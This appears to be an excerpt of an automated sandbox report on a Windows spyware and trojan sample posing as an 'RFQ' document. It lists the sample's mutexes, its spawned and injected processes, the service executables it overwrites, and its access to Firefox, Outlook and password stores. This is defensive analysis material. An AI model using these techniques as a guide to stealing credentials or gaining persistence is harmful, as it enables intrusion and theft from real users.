                Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@12/13@10/7
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00B9CBD0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Users\user\AppData\Roaming\902dfe32f8c88b11.binJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-902dfe32f8c88b119e7986a9-b
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-902dfe32f8c88b11-inf
                Source: C:\Windows\System32\AppVClient.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-902dfe32f8c88b119ea72c54-b
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut8E66.tmpJump to behavior
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: choice.exe, 00000010.00000003.2170835715.00000000026E8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.2172223460.000000000271C000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.2172223460.00000000026E8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.2170003056.000000000271C000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2744008676.00000000026E8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2744008676.000000000271C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RFQ _ Virtue 054451000085.exeReversingLabs: Detection: 81%
                Source: RFQ _ Virtue 054451000085.exeVirustotal: Detection: 75%
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"
                Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"
                Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
                Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"Jump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: RFQ _ Virtue 054451000085.exeStatic file information: File size 1801728 > 1048576
                Source: RFQ _ Virtue 054451000085.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: choice.pdbGCTL source: svchost.exe, 0000000A.00000003.1915858203.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1914993695.000000000341A000.00000004.00000020.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000003.1891549691.00000000014A5000.00000004.00000001.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000002.2748610451.000000000148E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1491077999.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518745124.0000000004190000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495810480.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518745124.0000000004190000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1530790654.0000000004180000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationFontCache.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1530790654.0000000004180000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iavbXasnTxCeiF.exe, 0000000D.00000002.2742686051.000000000021E000.00000002.00000001.01000000.00000005.sdmp, iavbXasnTxCeiF.exe, 00000011.00000000.2031373413.000000000021E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
                Source: Binary string: wntdll.pdbUGP source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1534604945.0000000005060000.00000004.00001000.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1532831867.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1839279919.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1841739814.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1953424906.0000000004257000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1948543283.00000000040A4000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.000000000459E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.0000000004400000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1534604945.0000000005060000.00000004.00001000.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1532831867.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000A.00000003.1839279919.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1841739814.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1953424906.0000000004257000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1948543283.00000000040A4000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.000000000459E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.0000000004400000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
                Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
                Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
                Source: Binary string: ALG.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495810480.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: choice.pdb source: svchost.exe, 0000000A.00000003.1915858203.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1914993695.000000000341A000.00000004.00000020.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000003.1891549691.00000000014A5000.00000004.00000001.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000002.2748610451.000000000148E000.00000004.00000020.00020000.00000000.sdmp
                Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: elevation_service.exe.0.drStatic PE information: section name: .00cfg
                Source: elevation_service.exe.0.drStatic PE information: section name: .gxfg
                Source: elevation_service.exe.0.drStatic PE information: section name: .retplne
                Source: elevation_service.exe.0.drStatic PE information: section name: _RDATA
                Source: elevation_service.exe.0.drStatic PE information: section name: malloc_h
                Source: armsvc.exe.0.drStatic PE information: section name: .didat
                Source: alg.exe.0.drStatic PE information: section name: .didat
                Source: FXSSVC.exe.0.drStatic PE information: section name: .didat
                Source: elevation_service.exe0.0.drStatic PE information: section name: .00cfg
                Source: elevation_service.exe0.0.drStatic PE information: section name: .gxfg
                Source: elevation_service.exe0.0.drStatic PE information: section name: .retplne
                Source: elevation_service.exe0.0.drStatic PE information: section name: _RDATA
                Source: elevation_service.exe0.0.drStatic PE information: section name: malloc_h
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B7B180 push 00B7B0CAh; ret 0_2_00B7B061
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B7B180 push 00B7B30Dh; ret 0_2_00B7B1E6
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B7B180 push 00B7B2F2h; ret 0_2_00B7B262
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B7B180 push 00B7B255h; ret 0_2_00B7B2ED
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B7B180 push 00B7B2D0h; ret 0_2_00B7B346
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B7B180 push 00B7B37Fh; ret 0_2_00B7B3B7
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B9852Eh; ret 0_2_00B97F3A
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98514h; ret 0_2_00B97F66
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B97E66h; ret 0_2_00B98057
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B9817Ah; ret 0_2_00B9808B
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B982E5h; ret 0_2_00B980D9
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B9826Ah; ret 0_2_00B9819E
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B9849Ch; ret 0_2_00B981E4
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98321h; ret 0_2_00B982E0
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B97FBFh; ret 0_2_00B9831F
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B97FA8h; ret 0_2_00B9834C
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B984BAh; ret 0_2_00B983E2
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98426h; ret 0_2_00B984D8
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98075h; ret 0_2_00B984FD
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B9808Ch; ret 0_2_00B98512
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98B6Fh; ret 0_2_00B98596
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98E94h; ret 0_2_00B985C9
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B9878Bh; ret 0_2_00B98734
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98D45h; ret 0_2_00B987D3
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98E5Fh; ret 0_2_00B9885F
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98AB5h; ret 0_2_00B98B13
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98784h; ret 0_2_00B98CA1
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98DC9h; ret 0_2_00B98E1C
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B98550 push 00B98D14h; ret 0_2_00B98E2E
                Source: RFQ _ Virtue 054451000085.exeStatic PE information: section name: .reloc entropy: 7.938034859964451
                Source: elevation_service.exe.0.drStatic PE information: section name: .reloc entropy: 7.9475115066872
                Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.943019776984643
                Source: FXSSVC.exe.0.drStatic PE information: section name: .reloc entropy: 7.9492983380780915
                Source: elevation_service.exe0.0.drStatic PE information: section name: .reloc entropy: 7.9507991436689505

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\902dfe32f8c88b11.binJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
